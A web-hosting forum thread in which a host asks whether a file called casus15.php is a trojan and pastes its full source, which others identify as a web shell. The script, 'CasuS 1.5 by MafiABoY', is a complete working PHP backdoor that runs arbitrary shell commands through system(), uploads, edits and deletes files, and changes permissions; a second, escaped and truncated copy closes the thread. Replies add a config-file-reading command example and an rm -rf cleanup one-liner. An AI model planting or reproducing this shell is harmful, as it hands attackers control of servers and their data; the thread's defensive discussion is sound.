Results 1 to 16 of 16
  1. #1
    Join Date
    Sep 2004
    Posts
    55

    * casus15.php is it a trojan ???

    Just received an email from a customer that he found a trojan on his website called casus15.php

    I have never heared of such trojan before, I believe that it is wiki file!

    Can someone here help us please?

    Is it a trojan? and if so what is the safest way to find it and remove it?

    The customer sent to me the file, so I will have it if required.

    cheers

  2. #2
    Join Date
    Aug 2004
    Location
    USA
    Posts
    19
    if you mean a trojan to your server, id highly doubt a PHP script could be a backdoor trojan... or have the access! BUT! to be on the safe side, you should look at the source.... see what it does. Then make your own judgement from it.

  3. #3
    Join Date
    Apr 2004
    Location
    Australia
    Posts
    419
    Check what its looking it up, also chmod it correctly (not 777)

  4. #4
    Join Date
    Aug 2004
    Location
    USA
    Posts
    19
    the chmod permission isant the only permissioning it would need... for a trojan it would need some access, to suexec or somthing with power, and it would be in a socket maybe, just some quick assumsitions.

  5. #5
    Join Date
    Sep 2004
    Posts
    55
    Well it looks pretty ugly!

    I think we will need a Turk expert here,

    I will paste it her and let the experts tell us what it does:

    <?php
    $default=$DOCUMENT_ROOT;
    $this_file="./casus15.php";



    if(isset($save)){
    $fname=str_replace(" ","_",$fname);
    $fname=str_replace("%20","_",$fname);
    header("Cache-control: private");
    header("Content-type: application/force-download");
    header("Content-Length: ".filesize($save));
    header("Content-Disposition: attachment; filename=$fname");

    $fp = fopen($save, 'r');
    fpassthru($fp);
    fclose($fp);
    unset($save);
    exit;
    }

    if ( function_exists('ini_get') ) {
    $onoff = ini_get('register_globals');
    } else {
    $onoff = get_cfg_var('register_globals');
    }
    if ($onoff != 1) {
    @extract($_POST, EXTR_SKIP);
    @extract($_GET, EXTR_SKIP);
    }


    function deltree($deldir) {
    $mydir=@dir($deldir);
    while($file=$mydir->read()) {
    if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
    @chmod("$deldir/$file",0777);
    deltree("$deldir/$file");
    }
    if (is_file("$deldir/$file")) {
    @chmod("$deldir/$file",0777);
    @unlink("$deldir/$file");
    }
    }
    $mydir->close();
    @chmod("$deldir",0777);
    echo @rmdir($deldir) ? "<center><b><font color='#0000FF'>SİLİNDİ:$deldir/$file</b></font></center>" : "<center><font color=\"#ff0000\">Silinemedi:$deldir/$file</font></center>";
    }

    if ($op=='phpinfo'){
    $fonk_kap = get_cfg_var("fonksiyonları_kapat");
    echo $phpinfo=(!eregi("phpinfo",$fonk_kapat)) ? phpinfo() : "<center>phpinfo() Komutu Çalışmıyiii</center>";
    exit;
    }

    if ($op=='me'){
    echo "<html>
    <head>
    <title>CEHENNEMDEN ÇIKAN ÇILGIN TÜRK</title>
    </head>
    <body bgcolor='#000000' text='#0000FF' link='#0000FF' vlink='#0000FF' alink='#00FF00'>
    <center>Fazla söze gerek yok...</center>
    <center><br>O yanlız bir kovboy,<br>
    <br>O cehennemden çıkan çılgın TÜRK,<br>
    <br>O bir rap manyağı,<br>
    <br>O bir php coder,<br>
    <br>O'nun hackten daha çok sevdiği tek şey iki hack,<br>
    <br>O...<br>
    <br>O'nun kim olduunu biliyorsunuz O tabiki...<br>
    <br></center>";

    $sayi='7';
    while($sayi>=1){
    echo "<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'> EFENDISI</font> <font color='#FF0000'>MAFIABOY</font> </font></center>";
    $sayi--;
    }
    $sayi2='1';
    while($sayi2<=7){
    echo "<center><font size='$sayi2' color='#008000'>baddog@hotmail.com</font></center>";
    $sayi2++;
    };

    echo "</body>
    </html>";
    exit;
    }


    echo "<html>
    <head>
    <title>CasuS 1.5 by MafiABoY</title>
    </head>

    <body bgcolor='#000000' text='#008000' link='#00FF00' vlink='#00FF00' alink='#00FF00'>
    </body>";

    echo "<center><font size='+3' color='#FF0000'><b> CasuS 1.5!!! Powered by MafiABoY</b></font></center><br>
    <center><font size='+2' color='#FFFFFF'>A TURKISH </font><font size='+2' color='#FF0000'>HACKER</font><br>
    <br>";
    echo "<center><a href='./$this_file?dir=$dir'>ANA BOLUM</a></center>";
    echo "<br>";
    echo "<center><a href='./$this_file?op=phpinfo' target='_blank'>PHP INFO</a></center>";
    echo "<br>";
    echo "<center><a href='./$this_file?op=wshell&dir=$dir'>WEB SHELL</a></center>";
    echo "<br>
    <br>
    <br>";
    echo "<center>---><a href='./$this_file?op=me' target='_blank'>MafiABoY</a><---</center>";

    echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
    echo "<div align=center>
    <font size='+1' color='#0000FF'><u>Root Klasör</u>: $DOCUMENT_ROOT</font><br>
    <font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HOST$REDIRECT_URL</font> <form method=post action=$this_file>";

    if(!isset($dir)){
    $dir="$default";
    }
    echo "<input type=text size=60 name=dir value='$dir'>
    <input type=submit value='GIT'><br>
    </form>
    </div>";

    if ($op=='wshell'){
    echo "<br><center><font size='+1' color='#FF0000'>WEBSHELL</font></center>";
    if (isset($ok)){
    if (empty($kod)){
    die ("<center><font color='#FF0000'>LEN MANYAK KOMUT YAZMAZSAN NE MOK İŞİNE YARAR</font><center>");
    }
    echo "<form method='Post' action='./$this_file?op=wshell&dir=$dir'>
    <br>";
    echo "<center><input type=text size=35 name=kod value='$kod'><input type=submit name=ok value='CALISTIR'>
    <br>
    <br></center></form>";
    echo "<center><TEXTAREA rows=30 cols=85 readonly>";
    system("$kod");
    echo "</TEXTAREA></center>";
    exit;

    } elseif (empty($ok)){
    echo "<form method='Post' action='./$this_file?op=wshell&dir=$dir'>
    <br>";
    echo "<center><input type=text size=35 name=kod value='Calistirmak istediginiz komutu buraya girin'><input type=submit name=ok value='CALISTIR'>
    <br>
    <br></center></form>";
    echo "<center><TEXTAREA rows=30 cols=85></TEXTAREA></center>";
    exit;
    }
    }

    if ($op=='up'){
    $path=dir;
    echo "<br><br><center><font size='+1' color='#FF0000'><b>DOSYA GONDERME</b></font></center><br>";
    if(isset($dy)) {

    if(empty($dosya_gonder)){
    } else {
    copy ( $dosya_gonder, "$dir/$dosya_gonder_name") ? print("$dosya_gonder_name <font color='#0000FF'>kopyalandı</font><br>") : print("$dosya_gonder_name <font color='#FF0000'>kopyalanamadı</font><br>");
    }

    if(empty($dosya_gonder2)){
    } else {
    copy ( $dosya_gonder2, "$dir/$dosya_gonder2_name") ? print("$dosya_gonder2_name <font color='#0000FF'>kopyaland</font>ı<br>") : print("$dosya_gonder2_name <font color='#FF0000'>kopyalanamadı</font><br>");
    }

    if(empty($dosya_gonder3)){
    } else {
    copy ( $dosya_gonder3, "$dir/$dosya_gonder3_name") ? print("$dosya_gonder3_name <font color='#0000FF'>kopyalandı</font><br>") : print("$dosya_gonder3_name <font color='#FF0000'>kopyalanamadı</font><br>");
    }

    if(empty($dosya_gonder4)){
    } else {
    copy ( $dosya_gonder4, "$dir/$dosya_gonder4_name") ? print("$dosya_gonder4_name <font color='#0000FF'>kopyalandı</font><br>") : print("$dosya_gonder4_name <font color='#FF0000'>kopyalanamadı</font><br>");
    }

    } elseif(empty($dy )) {
    $path=$dir;
    $dir = $dosya_dizin;
    echo "$dir";
    echo "<FORM ENCTYPE='multipart/form-data' ACTION='$this_file?op=up&dir=$path' METHOD='POST'>";
    echo "<center><INPUT TYPE='file' NAME='dosya_gonder'></center><br>";
    echo "<center><INPUT TYPE='file' NAME='dosya_gonder2'></center><br>";
    echo "<center><INPUT TYPE='file' NAME='dosya_gonder3'></center><br>";
    echo "<center><INPUT TYPE='file' NAME='dosya_gonder4'></center><br>";

    echo "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>";
    echo "</form>";


    echo "</html>";
    }
    }


    if($op=='mf'){
    $path=$dir;
    if(isset($dismi) && isset($kodlar)){
    $ydosya="$path/$dismi";
    if(file_exists("$path/$dismi")){
    $dos= "Böyle Bir Dosya Vardı Üzerine Yazıldı";
    } else {
    $dos = "Dosya Oluşturuldu";
    }
    touch ("$path/$dismi") or die("Dosya Oluşturulamıyor");
    $ydosya2 = fopen("$ydosya", 'w') or die("Dosya yazmak için açılamıyor");
    fwrite($ydosya2, $kodlar) or die("Dosyaya yazılamıyor");
    fclose($ydosya2);
    echo "<center><font color='#0000FF'>$dos</font></center>";
    } else {

    echo "<FORM METHOD='POST' ACTION='$this_file?op=mf&dir=$path'>";
    echo "<center>Dosya İsmi :<input type='text' name='dismi'></center><br>";
    echo "<br>";
    echo "<center>KODLAR</center><br>";
    echo "<center><TEXTAREA NAME='kodlar' ROWS='19' COLS='52'></TEXTAREA></center>";
    echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
    echo "</form>";
    }
    }

    if($op=='md'){
    $path=$dir;
    if(isset($kismi) && isset($okmf)){
    $klasör="$path/$kismi";
    mkdir("$klasör", 0777) or die ("<center><font color='#0000FF'>Klasör Oluşturulamıyor</font></center>");
    echo "<center><font color='#0000FF'>Klasör Oluşturuldu</font></center>";
    }

    echo "<FORM METHOD='POST' ACTION='$this_file?op=md&dir=$path'>";
    echo "<center>Klasör İsmi :<input type='text' name='kismi'></center><br>";
    echo "<br>";
    echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
    echo "</form>";
    }


    if($op=='del'){
    unlink("$fname");
    }


    if($op=='dd'){
    $dir=$here;
    $deldirs=$yol;
    if(!file_exists("$deldirs")) {
    echo "<font color=\"#ff0000\">Dosya Yok</font>";
    } else {
    deltree($deldirs);
    }
    }



    if($op=='edit'){
    $yol=$fname;
    $yold=$path;
    if (isset($ok)){
    $dosya = fopen("$yol", 'w') or die("Dosya Açılamıyor");
    $metin=$tarea;
    fwrite($dosya, $metin) or die("Yazılamıyor!");
    fclose($dosya);
    echo "<center><font color='#0000FF'Dosya Başarıyla Düzenlendi</font></center>";
    } else {
    $path=$dir;
    echo "<center>DÜZENLE: $yol</center>";
    $dosya = fopen("$yol", 'r') or die("<center><font color='#FF0000'Dosya Açılamıyor</font></center>");
    $boyut=filesize($yol);
    $duzen = @fread ($dosya, $boyut);
    echo "<form method=post action=$this_file?op=edit&fname=$yol&dir=$path>";
    echo "<center><TEXTAREA style='WIDTH: 476px; HEIGHT: 383px' name=tarea rows=19 cols=52>$duzen</TEXTAREA></center><br>";
    echo "<center><input type='Submit' value='TAMAM' name='ok'></center>";
    fclose($dosya);
    $duzen=htmlspecialchars($duzen);
    echo "</form>";
    }
    }

    if($op=='efp2'){
    $fileperm=base_convert($_POST['fileperm'],8,10);
    echo $msg=@chmod($dir."/".$dismi2,$fileperm) ? "<font color='#0000FF'><b>$dismi2 İSİMLİ DOSYANIN</font></b>" : "<font color=\"#ff0000\">DEİŞTİRİLEMEDİ!!</font>";
    echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($dir."/".$dismi2),10,8),-4)." OLARAK DEİŞTİRİLDİ</font>";
    }

    if($op=='efp'){
    $izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
    echo "<form method=post action=./$this_file?op=efp2>
    <div align=center><input name='dismi2' type='text' value='$dismi' class='input' readonly>CHMOD:
    <input type='text' name='fileperm' size='20' value='$izinler2' class='input'>
    <input name='dir' type='hidden' value='$yol'>
    <input type='submit' value='TAMAM' class='input'></div><br>
    </form>";

    }


    $path=$dir;
    if(isset($dir)){
    if ($dir = @opendir("$dir")) {
    while (($file = readdir($dir)) !== false) {
    if($file!="." && $file!=".."){
    if(is_file("$path/$file")){
    $disk_space=filesize("$path/$file");
    $kb=$disk_space/1024;
    $total_kb = number_format($kb, 2, '.', '');
    $total_kb2="Kb";


    echo "<div align=right><font face='arial' size='2' color='#C0C0C0'><b> $file</b></font> - <a href='./$this_file?save=$path/$file&fname=$file'>indir</a> - <a href='./$this_file?op=edit&fname=$path/$file&dir=$path'>düzenle</a> - ";
    echo "<a href='./$this_file?op=del&fname=$path/$file&dir=$path'>sil</a> - <b>$total_kb$total_kb2</b> - ";
    @$fileperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
    echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><font color='#FFFF00'>$fileperm</font></a>";
    echo "<br></div>\n";
    }else{
    echo "<div align=left><a href='./$this_file?dir=$path/$file'>GİT></a> <font face='arial' size='3' color='#808080'> $path/$file</font> - <b>DIR</b> - <a href='./$this_file?op=dd&yol=$path/$file&here=$path'>Sil</a> - ";
    $dirperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
    echo "<font color='#FFFF00'>$dirperm</font>";
    echo " <br></div>\n";

    }
    }
    }
    closedir($dir);
    }
    }




    echo "<center>------------------------------</center>";
    echo "<center><a href='./$this_file?dir=$DOCUMENT_ROOT'>Root Klasörüne Git</a></center>";
    echo "<center><a href='./$this_file?dir=/'>Linux Kök Dizinine Git</a></center>";
    if(file_exists("B:\\")){
    echo "<center><a href='./$this_file?dir=B:\\'>B:\\</a></center>";
    } else {}
    if(file_exists("C:\\")){
    echo "<center><a href='./$this_file?dir=C:\\'>C:\\</a></center>";
    } else {}
    if (file_exists("D:\\")){
    echo "<center><a href='./$this_file?dir=D:\\'>D:\\</a></center>";
    } else {}
    if (file_exists("E:\\")){
    echo "<center><a href='./$this_file?dir=E:\\'>E:\\</a></center>";
    } else {}
    if (file_exists("F:\\")){
    echo "<center><a href='./$this_file?dir=F:\\'>F:\\</a></center>";
    } else {}
    if (file_exists("G:\\")){
    echo "<center><a href='./$this_file?dir=G:\\'>G:\\</a></center>";
    } else {}
    if (file_exists("H:\\")){
    echo "<center><a href='./$this_file?dir=H:\\'>H:\\</a></center>";
    } else {}


    echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
    echo "<center><font size='+1' color='#FF0000'><b>SERVER BİLGİLERİ</b></font><br></center>";
    echo "<br><u><b>$SERVER_SIGNATURE</b></u>";
    echo "<b><u>Software</u>: $SERVER_SOFTWARE</b><br>";
    echo "<b><u>Server IP</u>: $SERVER_ADDR</b><br>";
    echo "<br>";
    echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
    echo "<center><font size='+1' color='#FF0000'><b>İŞLEMLER</b></font><br></center>";
    echo "<br><center><font size='4'><a href='$this_file?op=up&dir=$path'>Dosya Gönder</a></font></center>";
    echo "<br><center><font size='4'><a href='$this_file?op=mf&dir=$path'>Dosya Oluştur</a></font></center>";
    echo "<br><center><font size='4'><a href='$this_file?op=md&dir=$path'>Klasör Oluştur</a></font></center>";
    echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
    echo "<br>
    <center>Tüm hakları sahibi MafiABoY'a aittir</center>";
    ?>

  6. #6
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,681
    Its not a trojan. Its a script that was created to excute system commands on your server using the system() function. This is not a good thing, the attack could do

    system(cat /home/user/public_html/config.php);

    for example, if your server is not properly secured.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  7. #7
    Join Date
    Sep 2004
    Posts
    55
    Originally posted by thelinuxguy
    Its not a trojan. Its a script that was created to excute system commands on your server using the system() function. This is not a good thing, the attack could do

    system(cat /home/user/public_html/config.php);

    for example, if your server is not properly secured.
    Thank you very much, that is what I suspected.

    This script was found by one of my customers on his websites.

    What can I do to locate any other copies and destroy them and what is the safest way??

    Thank you very much in advance.

  8. #8
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,681
    guessing you have linux/freebsd just rm -f the files. They are just php files.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  9. #9
    Join Date
    Jan 2004
    Location
    /home/dislexik
    Posts
    823
    Try this command:

    find /home -name casus15.php -print0 | xargs -0 rm -rf

    That will search /home for all files by the name of casus15.php and pass it through rm -rf (Removes it)

    DislexiK
    "You don’t learn to hack, you hack to learn"

  10. #10
    Join Date
    Mar 2004
    Location
    Los Angeles
    Posts
    622
    Some words translated into English in this file:

    Lords of the Hackers
    Server Information
    Go to Root Folder
    Change the permissions of the file
    etc.

    Goes like this.

  11. #11
    Join Date
    Sep 2004
    Location
    Flint, Michigan
    Posts
    5,766
    What language is that in? And what is the user running on his site that would allow somebody else to place the file and execute it? php-nuke or something?

  12. #12
    Join Date
    Jan 2004
    Location
    /home/dislexik
    Posts
    823
    justadollarhostin,

    The extension seems to show it is a php file, therefore I am guessing - but only guessing ... that it is PHP

    DislexiK
    "You don’t learn to hack, you hack to learn"

  13. #13
    Join Date
    Sep 2004
    Location
    Flint, Michigan
    Posts
    5,766
    Originally posted by DislexiK
    justadollarhostin,

    The extension seems to show it is a php file, therefore I am guessing - but only guessing ... that it is PHP

    DislexiK
    That was my guess too

    But having read the source of the PHP file, i was curious as to the language used in it:

    <center><br>O yanlız bir kovboy,<br>
    <br>O cehennemden çıkan çılgın TÜRK,<br>
    <br>O bir rap manyağı,<br>
    <br>O bir php coder,<br>
    <br>O'nun hackten daha çok sevdiği tek şey iki hack,<br>
    <br>O...<br>
    <br>O'nun kim olduunu biliyorsunuz O tabiki...<br>

  14. #14
    Join Date
    Jul 2003
    Location
    Kuwait
    Posts
    5,104
    If you have safemode and proper permissions on your servers, this script can't do much -- other than take up space....which rm can fix.

    As easy way to find out if this script exists on your server -- take a md5 hash of it, then write a script that can compare the md5 hashes of other php files and compare it. If the hash matches, the file is there (even if it has a different name).

    Would take a lot of server crunch time -- but if you have a spare box, you could wget the files and then have the check running on the spare box.

    If you just check for the filename, then if the same code exists with a different filename, the vulnerability will still be there.

  15. #15
    Join Date
    Jul 2004
    Location
    Texas
    Posts
    688
    Originally posted by justadollarhostin
    What language is that in? And what is the user running on his site that would allow somebody else to place the file and execute it? php-nuke or something?
    If you look search 'CaSuS 1.5 by Mafiaboy' on google, click cached pages, it seems that it is a Turk hacker. Maybe he finds exploits in stuff? Some things are in 'uploads' directories.

  16. #16
    Join Date
    Apr 2004
    Location
    Phx, AZ, USA
    Posts
    12
    I know this is an old post, but we just found one of these files on our Windows 2003 Server. We are using a Unique IUSR for each domain, but considering it works at system level, that would be nothing.

    Any way to block this from working?

    PHP Code:
    <?php
    $default
    =$DOCUMENT_ROOT;
    $this_file=\"./casus15.php\";



    if(isset(
    $save)){
    $fname=str_replace(\" \",\"_\",$fname);
    $fname=str_replace(\"%20\",\"_\",$fname);
    header(\"Cache-control: private\");
    header(\"Content-type: application/force-download\");
    header(\"Content-Length: \".filesize(
    $save));
    header(\"Content-Disposition: attachment; filename=
    $fname\");

    $fp = fopen($save, \'r\');
    fpassthru(
    $fp);
    fclose(
    $fp);
    unset(
    $save);
    exit;
    }

    if ( function_exists(\'ini_get\') ) {
            
    $onoff = ini_get(\'register_globals\');
    } else {
            
    $onoff = get_cfg_var(\'register_globals\');
    }
    if (
    $onoff != 1) {
            @extract(
    $_POST, EXTR_SKIP);
            @extract(
    $_GET, EXTR_SKIP);
    }


    function deltree(
    $deldir) {
            
    $mydir=@dir($deldir);
            while(
    $file=$mydir->read())        {
                    if((is_dir(\"
    $deldir/$file\")) AND ($file!=\".\") AND ($file!=\"..\")) {
                            @chmod(\"
    $deldir/$file\",0777);
                            deltree(\"
    $deldir/$file\");
                    }
                    if (is_file(\"
    $deldir/$file\")) {
                            @chmod(\"
    $deldir/$file\",0777);
                            @unlink(\"
    $deldir/$file\");
                    }
            }
            
    $mydir->close();
            @chmod(\"
    $deldir\",0777);
            echo @rmdir(
    $deldir) ? \"<center><b><font color=\'#0000FF\'>SİLİNDİ:$deldir/$file</b></font></center>\" : \"<center><font color=\\\"#ff0000\\\">Silinemedi:$deldir/$file</font></center>\";
            }

    if (
    $op==\'phpinfo\'){
    $fonk_kap = get_cfg_var(\"fonksiyonları_kapat\");
            echo 
    $phpinfo=(!eregi(\"phpinfo\",$fonk_kapat)) ? phpinfo() : \"<center>phpinfo() Komutu Çalışmıyiii</center>\";
            exit;
    }

    if (
    $op==\'me\'){
    echo \"<html>
          <head>
                <title>CEHENNEMDEN ÇIKAN ÇILGIN TÜRK</title>
          </head>
          <body bgcolor=\'#000000\' text=\'#0000FF\' link=\'#0000FF\' vlink=\'#0000FF\' alink=\'#00FF00\'>
          <center>Fazla söze gerek yok...</center>
          <center><br>O yanlız bir kovboy,<br>
          <br>O cehennemden çıkan çılgın TÜRK,<br>
          <br>O bir rap manyağı,<br>
          <br>O bir php coder,<br>
          <br>O\'nun hackten daha çok sevdiği tek şey iki hack,<br>
          <br>O...<br>
          <br>O\'nun kim olduunu biliyorsunuz O tabiki...<br>
          <br></center>\";

    $sayi=\'7\';
    while(
    $sayi>=1){
    echo \"<center><font size=\'
    $sayi\' color=\'#FFFFFF\'>HACKLERIN<font color=\'#008000\'> EFENDISI</font> <font color=\'#FF0000\'>MAFIABOY</font> </font></center>\";
    $sayi--;
    }
    $sayi2=\'1\';
    while(
    $sayi2<=7){
    echo \"<center><font size=\'
    $sayi2\' color=\'#008000\'>baddog@hotmail.com</font></center>\";
    $sayi2++;
    };

    echo \"</body>
          </html>\";
    exit;
    }


    echo \"<html>
          <head>
                 <title>CasuS 1.5 by MafiABoY</title>
          </head>

           <body bgcolor=\'#000000\' text=\'#008000\' link=\'#00FF00\' vlink=\'#00FF00\' alink=\'#00FF00\'>
           </body>\";

    echo \"<center><font size=\'+3\' color=\'#FF0000\'><b> CasuS 1.5!!! Powered by MafiABoY</b></font></center><br>
          <center><font size=\'+2\' color=\'#FFFFFF\'>A TURKISH </font><font size=\'+2\' color=\'#FF0000\'>HACKER</font><br>
          <br>\";
    echo \"<center><a href=\'./
    $this_file?dir=$dir\'>ANA BOLUM</a></center>\";
    echo \"<br>\";
    echo \"<center><a href=\'./
    $this_file?op=phpinfo\' target=\'_blank\'>PHP INFO</a></center>\";
    echo \"<br>\";
    echo \"<center><a href=\'./
    $this_file?op=wshell&dir=$dir\'>WEB SHELL</a></center>\";
    echo \"<br>
          <br>
          <br>\";
    echo \"<center>---><a href=\'./
    $this_file?op=me\' target=\'_blank\'>MafiABoY</a><---</center>\";

    echo \"--------------------------------------------------------------------------------------------------------------------------------------------------------------------\";
    echo \"<div align=center>
          <font size=\'+1\' color=\'#0000FF\'><u>Root Klasör</u>: 
    $DOCUMENT_ROOT</font><br>
          <font size=\'+1\'color=\'#0000FF\'><u>CasuS 1.5\'in URL\'si</u>: [url]http://[/url]
    $HTTP_HOST$REDIRECT_URL</font> <form method=post action=$this_file>\";

    if(!isset(
    $dir)){
    $dir=\"$default\";
    }
    echo \"<input type=text size=60 name=dir value=\'
    $dir\'>
    <input type=submit value=\'GIT\'><br>
    </form>
    </div>\";

    if (
    $op==\'wshell\'){
    echo \"<br><center><font size=\'+1\' color=\'#FF0000\'>WEBSHELL</font></center>\";
    if (isset(
    $ok)){
    if (empty(
    $kod)){
    die (\"<center><font color=\'#FF0000\'>LEN MANYAK KOMUT YAZMAZSAN NE MOK İŞİNE YARAR</font><center>\");
    }
    echo \"<form method=\'Post\' action=\'./
    $this_file?op=wshell&dir=$dir\'>
          <br>\";
    echo \"<center><input type=text size=35 name=kod value=\'
    $kod\'><input type=submit name=ok value=\'CALISTIR\'>
          <br>
          <br></center></form>\";
    echo \"<center><TEXTAREA rows=30 cols=85 readonly>\";
    system(\"
    $kod\");
    echo \"</TEXTAREA></center>\";
    exit;

    } elseif (empty(
    $ok)){
    echo \"<form method=\'Post\' action=\'./
    $this_file?op=wshell&dir=$dir\'>
          <br>\";
    echo \"<center><input type=text size=35 name=kod value=\'Calistirmak istediginiz komutu buraya girin\'><input type=submit name=ok value=\'CALISTIR\'>
          <br>
          <br></center></form>\";
    echo \"<center><TEXTAREA rows=30 cols=85></TEXTAREA></center>\";
    exit;
    }
    }

    if (
    $op==\'up\'){
            
    $path=dir;
            echo \"<br><br><center><font size=\'+1\' color=\'#FF0000\'><b>DOSYA GONDERME</b></font></center><br>\";
    if(isset(
    $dy)) {

    if(empty(
    $dosya_gonder)){
    } else {
    copy ( 
    $dosya_gonder, \"$dir/$dosya_gonder_name\") ? print(\"$dosya_gonder_name <font color=\'#0000FF\'>kopyalandı</font><br>\") : print(\"$dosya_gonder_name <font color=\'#FF0000\'>kopyalanamadı</font><br>\");
    }

    if(empty(
    $dosya_gonder2)){
    } else {
    copy ( 
    $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_name <font color=\'#0000FF\'>kopyaland</font>ı<br>\") : print(\"$dosya_gonder2_name <font color=\'#FF0000\'>kopyalanamadı</font><br>\");
    }

    if(empty(
    $dosya_gonder3)){
    } else {
    copy ( 
    $dosya_gonder3, \"$dir/$dosya_gonder3_name\") ? print(\"$dosya_gonder3_name <font color=\'#0000FF\'>kopyalandı</font><br>\") : print(\"$dosya_gonder3_name <font color=\'#FF0000\'>kopyalanamadı</font><br>\");
    }

    if(empty(
    $dosya_gonder4)){
    } else {
    copy ( 
    $dosya_gonder4, \"$dir/$dosya_gonder4_name\") ? print(\"$dosya_gonder4_name <font color=\'#0000FF\'>kopyalandı</font><br>\") : print(\"$dosya_gonder4_name <font color=\'#FF0000\'>kopyalanamadı</font><br>\");
    }

    } elseif(empty(
    $dy )) {
    $path=$dir;
    $dir = $dosya_dizin;
    echo \"
    $dir\";
    echo \"<FORM  ENCTYPE=\'multipart/form-data\' ACTION=\'
    $this_file?op=up&dir=$path\' METHOD=\'POST\'>\";
    echo \"<center><INPUT TYPE=\'file\' NAME=\'dosya_gonder\'></center><br>\";
    echo \"<center><INPUT TYPE=\'file\' NAME=\'dosya_gonder2\'></center><br>\";
    echo \"<center><INPUT TYPE=\'file\' NAME=\'dosya_gonder3\'></center><br>\";
    echo \"<center><INPUT TYPE=\'file\' NAME=\'dosya_gonder4\'></center><br>\";

    echo \"<br><center><INPUT TYPE=\'SUBMIT\' NAME=\'dy\' VALUE=\'Dosya Yolla!\'></center>\";
    echo \"</form>\";


    echo \"</html>\";
    }
    }


    if(
    $op==\'mf\'){
        
    $path=$dir;
        if(isset(
    $dismi) && isset($kodlar)){
                    
    $ydosya=\"$path/$dismi\";
                    if(file_exists(\"
    $path/$dismi\")){
                            
    $dos= \"Böyle Bir Dosya Vardı Üzerine Yazıldı\";
                    } else {
                            
    $dos = \"Dosya Oluşturuldu\";
                    }
                    touch (\"
    $path/$dismi\") or die(\"Dosya Oluşturulamıyor\");
                    
    $ydosya2 = fopen(\"$ydosya\", \'w\') or die(\"Dosya yazmak için açılamıyor\");
                    fwrite(
    $ydosya2$kodlar) or die(\"Dosyaya yazılamıyor\");
                    fclose(
    $ydosya2);
                    echo \"<center><font color=\'#0000FF\'>
    $dos</font></center>\";
            } else {

            echo \"<FORM METHOD=\'POST\' ACTION=\'
    $this_file?op=mf&dir=$path\'>\";
            echo \"<center>Dosya İsmi :<input type=\'text\' name=\'dismi\'></center><br>\";
        echo \"<br>\";
        echo \"<center>KODLAR</center><br>\";
        echo \"<center><TEXTAREA NAME=\'kodlar\' ROWS=\'19\' COLS=\'52\'></TEXTAREA></center>\";
            echo \"<center><INPUT TYPE=\'submit\' name=\'okmf\' value=\'TAMAM\'></center>\";
        echo \"</form>\";
            }
    }

    if(
    $op==\'md\'){
            
    $path=$dir;
            if(isset(
    $kismi) && isset($okmf)){
                    
    $klasör=\"$path/$kismi\";
                    mkdir(\"
    $klasör\", 0777) or die (\"<center><font color=\'#0000FF\'>Klasör Oluşturulamıyor</font></center>\");
                    echo \"<center><font color=\'#0000FF\'>Klasör Oluşturuldu</font></center>\";
            }

            echo \"<FORM METHOD=\'POST\' ACTION=\'
    $this_file?op=md&dir=$path\'>\";
            echo \"<center>Klasör İsmi :<input type=\'text\' name=\'kismi\'></center><br>\";
            echo \"<br>\";
            echo \"<center><INPUT TYPE=\'submit\' name=\'okmf\' value=\'TAMAM\'></center>\";
            echo \"</form>\";
    }


    if(
    $op==\'del\'){
    unlink(\"
    $fname\");
    }


    if(
    $op==\'dd\'){
            
    $dir=$here;
                    
    $deldirs=$yol;
                    if(!file_exists(\"
    $deldirs\")) {
                            echo \"<font color=\\\"#ff0000\\\">Dosya Yok</font>\";
                    } else {
                            deltree(
    $deldirs);
                    }
    }



    if(
    $op==\'edit\'){
    $yol=$fname;
    $yold=$path;
    if (isset(
    $ok)){
    $dosya = fopen(\"$yol\", \'w\') or die(\"Dosya Açılamıyor\");
    $metin=$tarea;
    fwrite(
    $dosya$metin) or die(\"Yazılamıyor!\");
    fclose(
    $dosya);
    echo \"<center><font color=\'#0000FF\'Dosya Başarıyla Düzenlendi</font></center>\";
    } else {
    $path=$dir;
    echo \"<center>DÜZENLE: 
    $yol</center>\";
    $dosya = fopen(\"$yol\", \'r\') or die(\"<center><font color=\'#FF0000\'Dosya Açılamıyor</font></center>\");
    $boyut=filesize($yol);
    $duzen = @fread ($dosya$boyut);
    echo \"<form method=post action=
    $this_file?op=edit&fname=$yol&dir=$path>\";
    echo \"<center><TEXTAREA style=\'WIDTH: 476px; HEIGHT: 383px\' name=tarea rows=19 cols=52>
    $duzen</TEXTAREA></center><br>\";
    echo \"<center><input type=\'Submit\' value=\'TAMAM\' name=\'ok\'></center>\";
    fclose(
    $dosya);
    $duzen=htmlspecialchars($duzen);
    echo \"</form>\";
    }
    }

    if(
    $op==\'efp2\'){
    $fileperm=base_convert($_POST[\'fileperm\'],8,10);
            echo 
